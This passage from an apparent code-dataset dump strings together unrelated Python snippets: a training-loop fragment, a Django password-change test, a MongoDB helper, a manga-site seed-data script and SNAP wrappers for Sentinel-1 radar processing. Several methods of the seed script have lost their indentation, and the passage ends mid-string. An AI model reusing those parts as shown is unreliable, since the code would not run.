        dacc = val_accs[-1] - val_accs[-2]
        if dacc <= 0.005:
            lr_decay = 0.05 * args.lr
            phase = 3
            print ('phase 3')
if args.save:
[w] = sess.run([weights], feed_dict={handle: val_handle, dropout_rate: 0.0, learning_rate: 0.0})
w['train_acc'] = train_accs
w['train_acc_top5'] = train_accs_top5
w['val_acc'] = val_accs
w['val_acc_top5'] = val_accs_top5
np.save(args.name, w)
print('epoch %d/%d' % (ii, args.epochs))
|
15,155 | 207b6b661734fa8be28bbaf42a5b37236d81e284 | # Rest Framework
from rest_framework import status
from rest_framework.test import APITestCase
# Project
from apps.shared.utils import reverse
from apps.shared import messages as msg
from .base import AuthTestCase, TEST_USER1, CURRENT_PASSWORD
NEW_PASSWORD = 'abc0987654321'
INVALID_PASSWORD = '123'
class ChangePasswordTest(APITestCase, AuthTestCase):
    """Integration tests for the change-password endpoint."""

    fixtures = ['user.yaml']
    url = 'apps.gauth:change-password'

    def _auth(self, data):
        # POST credentials to the auth endpoint.
        return self.client.post(reverse('apps.gauth:auth'), data)

    def _change_password(self, password):
        # Authenticate as admin, then PUT the new password.
        self._auth_admin()
        return self.client.put(reverse(self.url), {'password': password})

    def test_change_password_invalid(self):
        resp = self._change_password(INVALID_PASSWORD)
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
        # Both validators must reject: too short, and entirely numeric.
        self.assertEqual(resp.data['password'][0],
                         msg.INVALID_PASSWORD_LENGTH)
        self.assertEqual(resp.data['password'][1],
                         msg.INVALID_PASSWORD_ENTIRELY_NUMERIC)

    def test_change_password(self):
        # The current password authenticates before the change...
        credentials = {'username': TEST_USER1, 'password': CURRENT_PASSWORD}
        auth_response = self._auth(credentials)
        self.assertEqual(auth_response.status_code, status.HTTP_200_OK)
        # ...the change itself succeeds...
        self.assertNotEqual(CURRENT_PASSWORD, NEW_PASSWORD)
        change_response = self._change_password(NEW_PASSWORD)
        self.assertEqual(change_response.status_code, status.HTTP_200_OK)
        # ...and the new password authenticates afterwards.
        credentials = {'username': TEST_USER1, 'password': NEW_PASSWORD}
        auth_response = self._auth(credentials)
        self.assertEqual(auth_response.status_code, status.HTTP_200_OK)
|
15,156 | 3708a5505d5037abb923f09cef5242c769b78939 | count=0
# Count the vowels in the externally supplied string `s`.
# Fixed: iterate characters directly and test set membership instead of
# range(len(s)) indexing with a chained `or` of equality checks.
count = sum(1 for ch in s if ch in "aeiou")
print(count)
|
15,157 | 02336752fb2d603cc8abfe2a8a97a9fb22480e95 | from bson import ObjectId
from utility_functions import *
from bindings import database
from business_methods import User
def clean_id(x):
    """Normalize a Mongo document id: move `_id` into a string `id` field.

    When there is no `_id`, an existing non-None `id` is stringified.
    Fixed: the old `elif x['id'] is not None` raised KeyError when a
    document had neither key; use .get() so such documents pass through.
    """
    if '_id' in x:
        x['id'] = str(x.pop('_id'))
    elif x.get('id') is not None:
        x['id'] = str(x['id'])
    return x
def preprocess(x, requester_id=None):
    """Normalize a company document and attach viewer-relative badges.

    ``requester_id`` of None or '0' means anonymous (no badges). For a
    logged-in requester, the 'You follow' badge reflects their following
    list. A base64 placeholder image is added when imageUrl is missing.
    """
    x = clean_id(x)
    if requester_id and requester_id != '0':
        requester = dict(database['users'].find_one({'_id': ObjectId(requester_id)},
                         {'_id': 1, 'email': 1, "following": 1}
                         ))
        x["badges"] = []
        # NOTE(review): x is a company doc and requester a projected user
        # doc — this equality looks like it can never hold; confirm intent.
        if x == requester:
            return x
        if {'id': ObjectId(x['id'])} in requester["following"]:
            x["badges"].append({"category": "social", "name": "You follow"})
        # NOTE(review): `if True` unconditionally appends 'Watchout' —
        # looks like a placeholder for a real matching condition.
        if True:
            x["badges"].append({"category": "match", "name": "Watchout"})
    #Setting an image if not provided
    if 'imageUrl' not in x.keys():
        x['imageUrl'] = 'data:image/png;base64, ' + generate_profile_image().decode('utf-8')
    return x
def get_data(query, requester_id=None, return_unique=None):
    """Fetch companies matching ``query`` (passwords excluded).

    Returns the single preprocessed company when exactly one matched and
    ``return_unique`` is not False; otherwise {'body': [companies]}.
    """
    cursor = database['companies'].find(query, {'password': 0})
    companies = [preprocess(doc, requester_id) for doc in cursor]
    if return_unique is not False and len(companies) == 1:
        return companies[0]
    return {'body': companies}
|
15,158 | 9a4993632acd916a59889e2a2d7cf1959e1ad3c9 | import argparse
import datetime
import os
import random
import sys
from collections import defaultdict
PROJECT_PATH = os.sep.join(os.path.realpath(__file__).split(os.sep)[:-2])
sys.path.append(PROJECT_PATH)
os.environ['DJANGO_SETTINGS_MODULE'] = 'fufufuu.settings'
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.contrib.webdesign import lorem_ipsum
from fufufuu.comment.models import Comment
from fufufuu.blog.models import BlogEntry
from fufufuu.account.models import User
from fufufuu.core.languages import Language
from fufufuu.core.enums import SiteSettingKey
from fufufuu.core.models import SiteSetting
from fufufuu.core.utils import slugify, convert_markdown
from fufufuu.dmca.models import DmcaAccount
from fufufuu.manga.enums import MangaCategory, MangaStatus
from fufufuu.manga.models import Manga, MangaTag, MangaPage
from fufufuu.report.enums import ReportStatus, ReportMangaType
from fufufuu.report.models import ReportManga
from fufufuu.tag.enums import TagType
from fufufuu.tag.models import Tag, TagData, TagAlias
#-------------------------------------------------------------------------------
# Dataset-size profiles: 'default' for a full development database,
# 'test' for a minimal one. COMMENTS is a list of candidate per-object
# comment counts (sampled elsewhere).
CONFIGURATION = {
    'default': {
        'BLOG': 30,
        'COMMENTS': [0, 0, 0, 0, 0, 1, 2, 3],
        'MANGA': 3000,
        'REPORTS': 300,
        'TAGS': 600,
        'TAGS_FK': 30,
        'USERS': 5,
        # NOTE(review): unlike 'test', there is no 'COLLECTIONS' key here —
        # code reading config['COLLECTIONS'] would KeyError under 'default'.
    },
    'test': {
        'BLOG': 1,
        'COLLECTIONS': 1,
        'COMMENTS': [1],
        'MANGA': 1,
        'REPORTS': 1,
        'TAGS': 1,
        'TAGS_FK': 1,
        'USERS': 1,
    }
}
# Batch size for chunked bulk operations.
CHUNK_SIZE = 100
#-------------------------------------------------------------------------------
def timed(func):
    """
    use @timed to decorate a function that will print out the time it took
    for this function to run.
    """
    from functools import wraps

    # Fixed: without functools.wraps the decorated function lost its
    # __name__/__doc__, which also garbled the timing line's label when
    # decorators were stacked.
    @wraps(func)
    def inner(*args, **kwargs):
        start = datetime.datetime.now()
        result = func(*args, **kwargs)
        finish = datetime.datetime.now()
        print('\t{} - {}'.format(func.__name__, finish-start))
        return result
    return inner
#-------------------------------------------------------------------------------
class DataCreator:
    def __init__(self, configuration):
        # Select the size profile ('default' or 'test') from CONFIGURATION.
        self.config = CONFIGURATION[configuration]
    @timed
    def create_users(self):
        """Create the main staff/moderator user (stored on self.user, with a
        DMCA account) plus config['USERS'] plain users, all with password
        'password'."""
        def create_user_helper(username, **kwargs):
            # Build and persist one user; extra model fields via kwargs.
            user_data = {'username': username}
            user_data.update(**kwargs)
            user = User(**user_data)
            user.set_password('password')
            user.save()
            return user
        self.user = create_user_helper('testuser', is_staff=True, is_moderator=True)
        # NOTE(review): dmca_account is assigned after save() and the user is
        # not saved again here — confirm the FK is persisted where needed.
        self.user.dmca_account = DmcaAccount.objects.create(
            name='Sample DMCA Account',
            email='dmca@example.com',
            website='http://example.com/dmca',
        )
        for i in range(self.config['USERS']):
            create_user_helper('testuser{}'.format(i))
    @timed
    def create_tags(self):
        """Bulk-create config['TAGS'] tags for every many-to-many manga
        tag type, named '<type label> <i>'."""
        tag_list = []
        for tag_type in TagType.manga_m2m:
            for i in range(1, self.config['TAGS']+1):
                name = '{} {}'.format(TagType.choices_dict[tag_type], i)
                tag = Tag(tag_type=tag_type, name=name, slug=slugify(name), created_by=self.user, updated_by=self.user)
                tag_list.append(tag)
        Tag.objects.bulk_create(tag_list)
    @timed
    def create_tag_aliases(self):
        """Give each tag a random number of EN/JA aliases.

        Each successive alias is created with probability 0.2, so the
        alias count per tag is geometrically distributed (usually 0).
        """
        tag_alias_list = []
        for tag in Tag.objects.all():
            i = 1
            while random.random() < 0.2:
                language = random.choice([Language.ENGLISH, Language.JAPANESE])
                tag_alias = TagAlias(tag=tag, language=language, name='{} - Alias {}'.format(tag.name, i))
                tag_alias_list.append(tag_alias)
                i += 1
        TagAlias.objects.bulk_create(tag_alias_list)
    @timed
    def create_tag_data(self):
        """Create one TagData row per (tag, language) for 'en' and 'ja',
        with placeholder markdown/html content."""
        for language in ['en', 'ja']:
            tag_data_list = []
            for tag in Tag.objects.all():
                tag_data_list.append(TagData(
                    tag=tag,
                    language=language,
                    markdown='Tag Data - {} - {}'.format(tag.name, language),
                    html='Tag Data - {} - {}'.format(tag.name, language),
                    created_by=self.user,
                    updated_by=self.user,
                ))
            TagData.objects.bulk_create(tag_data_list)
@timed
def create_manga(self):
manga_category_keys = list(MangaCategory.choices_dict)
manga_list = []
for i in range(1, self.config['MANGA']+1):
title = 'Test Manga {}'.format(i)
manga = Manga(
title=title,
slug=slugify(title),
status=MangaStatus.PUBLISHED,
category=random.choice(manga_category_keys),
language=random.choice(['en'] * 9 + ['ja'] * 1),
uncensored=random.random() < 0.05,
published_on=timezone.now(),
created_by=self.user,
updated_by=self.user,
)
manga_list.append(manga)
Manga.objects.bulk_create(manga_list)
two_days_ago = timezone.now() - timezone.timedelta(days=2)
Manga.objects.update(created_on=two_days_ago, updated_on=two_days_ago, published_on=two_days_ago)
@timed
def assign_manga_tank(self):
manga_id_set = set(Manga.published.all().values_list('id', flat=True))
for i in range(1, self.config['TAGS_FK']+1):
tank_name = 'Tank {}'.format(i)
tank = Tag(tag_type=TagType.TANK, name=tank_name, slug=slugify(tank_name), created_by=self.user, updated_by=self.user)
tank.save(self.user)
tank_manga_count = random.randint(1, min(12, len(manga_id_set)))
tank_manga_id_set = random.sample(manga_id_set, tank_manga_count)
chapter_dict = defaultdict(int)
for manga_id in tank_manga_id_set:
manga = Manga.objects.get(id=manga_id)
chapter_dict[manga.language] += 1
manga.tank = tank
manga.tank_chapter = chapter_dict[manga.language]
manga.save(updated_by=manga.updated_by)
manga_id_set.remove(manga_id)
@timed
def assign_manga_collection(self):
manga_id_set = set(Manga.published.all().values_list('id', flat=True))
for i in range(1, self.config['TAGS_FK']+1):
collection_name = 'Collection {}'.format(i)
collection = Tag(tag_type=TagType.COLLECTION, name=collection_name, slug=slugify(collection_name), created_by=self.user, updated_by=self.user)
collection.save(self.user)
tank_manga_count = random.randint(1, min(12, len(manga_id_set)))
tank_manga_id_set = random.sample(manga_id_set, tank_manga_count)
part_dict = defaultdict(int)
for manga_id in tank_manga_id_set:
manga = Manga.objects.get(id=manga_id)
part_dict[manga.language] += 1
manga.collection = collection
manga.collection_part = part_dict[manga.language]
manga.save(updated_by=manga.updated_by)
manga_id_set.remove(manga_id)
@timed
def create_manga_tags(self):
tag_dict = defaultdict(list)
for tag in Tag.objects.all():
tag_dict[tag.tag_type].append(tag)
tag_content_count = len(tag_dict[TagType.CONTENT])
def _create_manga_tags(manga_list):
manga_tag_list = []
for manga in manga_list:
tag_list = []
for tag_type in [TagType.AUTHOR, TagType.CIRCLE, TagType.EVENT, TagType.MAGAZINE, TagType.PARODY, TagType.SCANLATOR]:
if random.random() < 0.5: tag_list.append(random.choice(tag_dict[tag_type]))
tag_list.extend(random.sample(tag_dict[TagType.CONTENT], random.randint(1, min(10, tag_content_count))))
manga_tag_list.extend(map(lambda tag: MangaTag(manga=manga, tag=tag), tag_list))
MangaTag.objects.bulk_create(manga_tag_list)
for i in range(0, Manga.objects.count(), CHUNK_SIZE):
_create_manga_tags(Manga.objects.all()[i:i+CHUNK_SIZE])
@timed
def create_manga_pages(self):
manga_page_list = []
for manga in Manga.objects.all():
manga_page_list.append(MangaPage(
manga=manga,
page=1,
name='001.jpg',
))
MangaPage.objects.bulk_create(manga_page_list)
@timed
def create_comments(self):
user_list = User.objects.all()
comment_list = []
for manga in Manga.published.all():
for i in range(random.choice(self.config['COMMENTS'])):
comment = lorem_ipsum.words(random.randint(1, 15), common=False)
comment_list.append(Comment(
content_type=ContentType.objects.get_for_model(manga),
object_id=manga.id,
markdown=comment,
html='<p>{}</p>'.format(comment),
created_by=random.choice(user_list),
))
Comment.objects.bulk_create(comment_list)
@timed
def create_manga_reports(self):
user_id_list = User.objects.all().values_list('id', flat=True)
manga_id_list = Manga.objects.all().values_list('id', flat=True)[:self.config['REPORTS']]
type_list = list(ReportMangaType.choices_dict.keys())
report_manga_list = []
for i in range(self.config['REPORTS']):
report_manga_list.append(ReportManga(
manga_id=random.choice(manga_id_list),
status=ReportStatus.OPEN,
type=random.choice(type_list),
comment=lorem_ipsum.sentence(),
weight=random.randint(1, 25),
created_by_id=random.choice(user_id_list),
))
ReportManga.all.bulk_create(report_manga_list)
@timed
def create_blog_entries(self):
blog_entry_list = []
for i in range(self.config['BLOG']):
title = lorem_ipsum.sentence()
markdown = '\n\n'.join(lorem_ipsum.paragraphs(random.randint(1, 3)))
blog_entry = BlogEntry(
title=title,
slug=slugify(title),
markdown=markdown,
html=convert_markdown(markdown),
created_by=self.user,
)
blog_entry_list.append(blog_entry)
BlogEntry.objects.bulk_create(blog_entry_list)
@timed
def create_settings(self):
settings = (
(SiteSettingKey.ENABLE_COMMENTS, 'True'),
(SiteSettingKey.ENABLE_DOWNLOADS, 'True'),
(SiteSettingKey.ENABLE_REGISTRATION, 'True'),
(SiteSettingKey.ENABLE_UPLOADS, 'True'),
)
for k, v in settings: SiteSetting.set_val(k, v, self.user)
def run(self):
print('-'*80)
print('datacreator.py started')
start = datetime.datetime.now()
self.create_users()
self.create_tags()
self.create_tag_aliases()
self.create_tag_data()
self.create_manga()
self.assign_manga_tank()
self.assign_manga_collection()
self.create_manga_tags()
self.create_manga_pages()
self.create_comments()
self.create_manga_reports()
self.create_blog_entries()
self.create_settings()
finish = datetime.datetime.now()
print('datacreator.py finished in {}'.format(finish-start))
print('-'*80)
#-------------------------------------------------------------------------------
if __name__ == '__main__':
    # Command-line entry point: choose a CONFIGURATION key and run.
    cli = argparse.ArgumentParser(description='Datacreator utility for Fufufuu')
    cli.add_argument('--config', dest='config', default='default', help='specify the configuration for datacreator to use (optional)')
    options = cli.parse_args()
    DataCreator(options.config).run()
|
# Read "<count> <k>" then the scores; print the k-th highest score.
_, prize_num = map(int, input().split())
ranked = sorted(map(int, input().split()), reverse=True)
print(ranked[prize_num - 1])
15,160 | a3219bce4c41288077776d06609aa9e1ead36aeb | # -*- coding: utf-8 -*-
import os
from os.path import join as opj
import logging
import sys
import rasterio
import warnings
from rasterio.errors import NotGeoreferencedWarning
from ost.helpers import utils as h
from ost.settings import SNAP_S1_RESAMPLING_METHODS, OST_ROOT
logger = logging.getLogger(__name__)
def _import(infile, out_prefix, logfile, swath, burst, polar='VV,VH,HH,HV'):
    '''A wrapper of SNAP import of a single Sentinel-1 SLC burst
    This function takes an original Sentinel-1 scene (either zip or
    SAFE format), updates the orbit information (does not fail if not
    available), and extracts a single burst based on the
    given input parameters.
    Args:
        infile: string or os.path object for
                an original Sentinel-1 GRD product in zip or SAFE format
        out_prefix: string or os.path object for the output
                    file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        swath (str): the corresponding IW subswath of the burst
        burst (str): the burst number as in the Sentinel-1 annotation file
        polar (str): a string consisiting of the polarisation (comma separated)
                     e.g. 'VV,VH',
                     default value: 'VV,VH,HH,HV'
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_BurstSplit_AO.xml')
    logger.debug('INFO: Importing Burst {} from Swath {} '
                 'from scene {}'.format(burst, swath, os.path.basename(infile))
                 )
    # NOTE(review): the backslash continuation below is *inside* the string
    # literal, so the next line's leading spaces become part of the command;
    # gpt tolerates the extra whitespace between options.
    command = '{} {} -x -q {} -Pinput={} -Ppolar={} -Pswath={}\
              -Pburst={} -Poutput={}'\
        .format(gpt_file, graph, 2, infile, polar, swath,
                burst, out_prefix)
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully imported product')
    else:
        # NOTE(review): error is logged at DEBUG level; the ERROR prefix in
        # the message may never be visible at default log levels — confirm.
        logger.debug('ERROR: Frame import exited with an error. \
                See {} for Snap Error output'.format(logfile))
        # sys.exit(119)
    return return_code
def _ha_alpha(infile, outfile, logfile, pol_speckle_filter=False):
    '''A wrapper of SNAP H-A-alpha polarimetric decomposition
    This function takes an OST imported Sentinel-1 scene/burst
    and calulates the polarimetric decomposition parameters for
    the H-A-alpha decomposition.
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        pol_speckle_filter (bool): wether or not to apply the
                                   polarimetric speckle filter
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    # the graph with the polarimetric speckle filter step differs only by
    # the additional 'Spk' operator
    if pol_speckle_filter:
        graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
                    'S1_SLC_Deb_Spk_Halpha.xml'
                    )
    else:
        graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
                    'S1_SLC_Deb_Halpha.xml'
                    )
    logger.debug("INFO: Calculating the H-alpha dual polarisation")
    command = '{} {} -x -q {} -Pinput={} -Poutput={}'\
        .format(gpt_file, graph, 2, infile, outfile)
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully created H/Alpha product')
    else:
        logger.debug('ERROR: H/Alpha exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(121)
    return return_code
def _calibration(infile,
                 outfile,
                 logfile,
                 product_type='GTCgamma',
                 dem='SRTM 1sec HGT',
                 resampling=SNAP_S1_RESAMPLING_METHODS[2],
                 dem_file='',
                 dem_nodata=0.0,
                 region=''
                 ):
    '''A wrapper around SNAP's radiometric calibration
    This function takes OST imported Sentinel-1 product and generates
    it to calibrated backscatter.
    3 different calibration modes are supported.
        - Radiometrically terrain corrected Gamma nought (RTC)
          NOTE: that the routine actually calibrates to bet0 and needs to
          be used together with _terrain_flattening routine
        - ellipsoid based Gamma nought (GTCgamma)
        - Sigma nought (GTCsigma).
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        product_type (str): the product type of the output product
                            i.e. RTC, GTCgamma or GTCsigma
        dem (str): SNAP-compliant name of the DEM (RTC mode only)
        resampling (str): SNAP resampling method name (RTC mode only)
        dem_file (str): path to an external DEM file (RTC mode only)
        dem_nodata (float): nodata value of the external DEM (RTC mode only)
        region (str): WKT region used to subset the burst
    Returns:
        int: return code of the gpt subprocess (0 on success);
             exits the interpreter for an unknown product_type
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    # each calibration mode uses its own processing graph and parameters
    if product_type == 'RTC':
        logger.debug('INFO: Calibrating the product to a RTC product.')
        graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
                    'S1_SLC_TNR_Calbeta_Deb_ML_TF_SUB.xml')
        command = '{} {} -x -q {} -Pdem=\'{}\' -Pdem_file="{}" ' \
                  '-Pdem_nodata={} -Presampling={} -Pregion="{}" -Pinput={} ' \
                  '-Poutput={}' \
            .format(gpt_file, graph, 2, dem, dem_file,
                    dem_nodata, resampling, region, infile, outfile)
    elif product_type == 'GTCgamma':
        logger.debug(
            'INFO: Calibrating the product to a GTC product (Gamma0).'
        )
        graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
                    'S1_SLC_TNR_CalGamma_Deb_SUB.xml')
        command = '{} {} -x -q {} -Pregion="{}" -Pinput={} -Poutput={}' \
            .format(gpt_file, graph, 2, region, infile, outfile)
    elif product_type == 'GTCsigma':
        logger.debug(
            'INFO: Calibrating the product to a GTC product (Sigma0).'
        )
        graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
                    'S1_SLC_TNR_CalSigma_Deb_SUB.xml')
        command = '{} {} -x -q {} -Pregion="{}" -Pinput={} -Poutput={}' \
            .format(gpt_file, graph, 2, region, infile, outfile)
    else:
        # NOTE(review): unlike the other error paths this one hard-exits
        # the interpreter — confirm this is intended for library code.
        logger.debug('ERROR: Wrong product type selected.')
        sys.exit(121)
    logger.debug("INFO: Removing thermal noise, calibrating and debursting")
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully calibrated product')
    else:
        # NOTE(review): message says 'Frame import' — copy-paste from
        # _import(); it actually refers to the calibration step.
        logger.debug('ERROR: Frame import exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(121)
    return return_code
def _speckle_filter(infile, outfile, logfile):
    '''A wrapper around SNAP's Refined Lee Speckle Filter
    This function takes OST imported Sentinel-1 product and applies
    a standardised version of the Lee-Sigma Speckle Filter with
    SNAP's defaut values.
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
    Returns:
        int: return code of the gpt subprocess (0 on success);
             exits the interpreter on failure (see note below)
    '''
    # get path to SNAP's command line executable gpt
    gpt_file = h.gpt_path()
    logger.debug('INFO: Applying the Refined-Lee Speckle Filter')
    # construct command string
    command = '{} Speckle-Filter -x -q {} -PestimateENL=true ' \
              '-Pfilter=\'Refined Lee\' -t \'{}\' ' \
              '\'{}\''.format(gpt_file, 2, outfile, infile)
    # run command and get return code
    return_code = h.run_command(command, logfile)
    # handle errors and logs
    if return_code == 0:
        # NOTE(review): success message says 'imported product' — copy-paste
        # from _import(); it actually refers to the speckle-filtered product.
        logger.debug('INFO: Succesfully imported product')
    else:
        logger.debug('ERROR: Speckle Filtering exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # NOTE(review): hard exit here, while sibling wrappers only return
        # the code — confirm the inconsistency is intended.
        sys.exit(111)
    return return_code
def _linear_to_db(infile, outfile, logfile):
    '''A wrapper around SNAP's linear to db routine
    This function takes an OST calibrated Sentinel-1 product
    and converts it to dB.
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get path to SNAP's command line executable gpt
    gpt_file = h.gpt_path()
    logger.debug('INFO: Converting the image to dB-scale.')
    # construct command string
    command = '{} LinearToFromdB -x -q {} -t \'{}\' {}'.format(
        gpt_file, 2, outfile, infile)
    # run command and get return code
    return_code = h.run_command(command, logfile)
    # handle errors and logs
    if return_code == 0:
        logger.debug('INFO: Succesfully converted product to dB-scale.')
    else:
        logger.debug('ERROR: Linear to dB conversion exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(113)
    return return_code
def _ls_mask(infile, outfile, logfile, resolution, dem='SRTM 1sec HGT'):
    '''A wrapper around SNAP's Layover/Shadow mask routine
    This function takes OST imported Sentinel-1 product and calculates
    the Layover/Shadow mask.
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        resolution (int): the resolution of the output product in meters
        dem (str): A Snap compliant string for the dem to use.
                   Possible choices are:
                       'SRTM 1sec HGT'(default)
                       'SRTM 3sec'
                       'ASTER 1sec GDEM'
                       'ACE30'
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_LS_TC.xml')
    logger.debug("INFO: Compute Layover/Shadow mask")
    command = '{} {} -x -q {} -Pinput={} -Presol={} -Poutput={} -Pdem=\'{}\''\
        .format(gpt_file, graph, 2, infile, resolution,
                outfile, dem)
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully created Layover/Shadow mask')
    else:
        logger.debug('ERROR: Layover/Shadow mask creation exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(121)
    return return_code
def _coreg(filelist, outfile, logfile, dem='SRTM 1sec HGT'):
    '''A wrapper around SNAP's back-geocoding co-registration routine
    This function takes a list of 2 OST imported Sentinel-1 SLC products
    and co-registers them properly. This routine is sufficient for coherence
    estimation, but not for InSAR, since the ESD refinement is not applied.
    Args:
        filelist: list of strings/os.path objects of the 2 OST imported
                  frames in BEAM-Dimap format (i.e. *.dim), master first
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        dem (str): A Snap compliant string for the dem to use.
                   Possible choices are:
                       'SRTM 1sec HGT'(default)
                       'SRTM 3sec'
                       'ASTER 1sec GDEM'
                       'ACE30'
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_BGD.xml')
    logger.debug('INFO: Co-registering {}'.format(filelist[0]))
    command = '{} {} -x -q {} -Pfilelist={} -Poutput={} -Pdem=\'{}\''\
        .format(gpt_file, graph, 2, filelist, outfile, dem)
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully coregistered product.')
    else:
        logger.debug('ERROR: Co-registration exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(112)
    return return_code
def _coreg2(master,
            slave,
            outfile,
            logfile, dem='SRTM 1sec HGT',
            master_burst_poly=''
            ):
    '''A wrapper around SNAP's back-geocoding co-registration routine
    This function takes 2 OST imported Sentinel-1 SLC products (master and
    slave) and co-registers them properly. This routine is sufficient for
    coherence estimation, but not for InSAR, since the ESD refinement is
    not applied.
    Args:
        master: string or os.path object for the master frame
                in BEAM-Dimap format (i.e. *.dim)
        slave: string or os.path object for the slave frame
               in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        dem (str): A Snap compliant string for the dem to use.
                   Possible choices are:
                       'SRTM 1sec HGT'(default)
                       'SRTM 3sec'
                       'ASTER 1sec GDEM'
                       'ACE30'
        master_burst_poly (str): WKT polygon of the master burst, passed
                                 as the subset region to the graph
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_Coreg.xml')
    logger.debug('INFO: Co-registering {} and {}'.format(master, slave))
    command = '{} {} -x -q {} -Pmaster={} -Pslave={} -Poutput={} ' \
              '-Pdem=\'{}\' -Pregion="{}"' \
        .format(gpt_file, graph, 2, master, slave,
                outfile, dem, master_burst_poly
                )
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully coregistered product.')
    else:
        logger.debug('ERROR: Co-registration exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(112)
    return return_code
def _coherence(infile, outfile, logfile):
    '''A wrapper around SNAP's coherence routine
    This function takes a co-registered stack of 2 Sentinel-1 SLC products
    and calculates the coherence.
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    # graph also debursts the coherence product
    graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_Coh_Deb.xml')
    logger.debug('INFO: Coherence estimation')
    command = '{} {} -x -q {} -Pinput={} -Poutput={}' \
        .format(gpt_file, graph, 2, infile, outfile)
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully created coherence product.')
    else:
        logger.debug('ERROR: Coherence exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(121)
    return return_code
def _terrain_correction(infile, outfile, logfile, resolution,
                        dem='SRTM 1sec HGT'):
    '''A wrapper around SNAP's Terrain Correction routine
    This function takes an OST calibrated Sentinel-1 product and
    does the geocodification.
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        resolution (int): the resolution of the output product in meters
        dem (str): A Snap compliant string for the dem to use.
                   Possible choices are:
                       'SRTM 1sec HGT'(default)
                       'SRTM 3sec'
                       'ASTER 1sec GDEM'
                       'ACE30'
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    logger.debug("INFO: Geocoding input scene")
    # NOTE(review): the backslash continuations below are *inside* the
    # string literal, so the leading spaces of each option line become part
    # of the command; gpt tolerates the extra whitespace.
    command = '{} Terrain-Correction -x -q {} \
              -PdemResamplingMethod=\'BILINEAR_INTERPOLATION\'\
              -PimgResamplingMethod=\'BILINEAR_INTERPOLATION\'\
              -PnodataValueAtSea=\'false\'\
